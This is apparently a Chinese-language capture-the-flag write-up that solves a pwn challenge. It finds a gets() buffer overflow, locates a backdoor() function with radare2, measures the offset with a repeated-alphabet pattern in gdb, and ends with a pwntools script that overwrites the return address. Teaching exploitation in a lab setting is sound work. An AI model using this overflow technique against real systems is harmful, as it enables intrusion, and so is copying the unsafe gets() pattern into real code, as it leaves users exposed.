# [CH] Tears of the Kingdom (Lite) ###### tags:`Writeup` `Pwn` `Chinese` > [name=FlyDragon] ## Step.1 查看源代碼可以發現餘料建造(Fuse)功能有 buffer overflow 的漏洞 ```c= printf("What do you want to combine your Master Sword with?\n"); char item_buf[0xff]; gets(item_buf); printf("Wow, you get a Master %s Sword!\n", item_buf); ``` 且有個可疑的 `backdoor()` 本題即是要透過 buffer overflow 執行 `backdoor()` 取得 flag ## Step.2 使用 radare2 查看 `backdoor()` ``` [0x00401110]> aaa [0x00401110]> afl [0x00401110]> pdf @ sym.backdoor ```  不過執行到 `push rbp` 會導致 EOF 所以可以直接跳到 0x401260 ## Step.3 接下來要計算 padding 字母表重複三次的時候出現 Segmentation fault 字母表 ``` AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ ``` ``` (gdb) info register ``` ``` rbp 0x5252525251515151 0x5252525251515151 ``` 0x51 是 Q 且 0x52 是 R 可以得到 padding ## Step.4 padding 加上 8 個 A 蓋掉 rbp 再接上要跳到的位置 撰寫解題程式 ```py= from pwn import * r = remote("lotuxctf.com", 10002) r.sendline("3") padding = b"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPP" rbp = b'AAAAAAAA' add = p64(0x401260) r.sendline(padding+rbp+add) r.interactive() ``` {%hackmd M1bgOPoiQbmM0JRHWaYA1g %}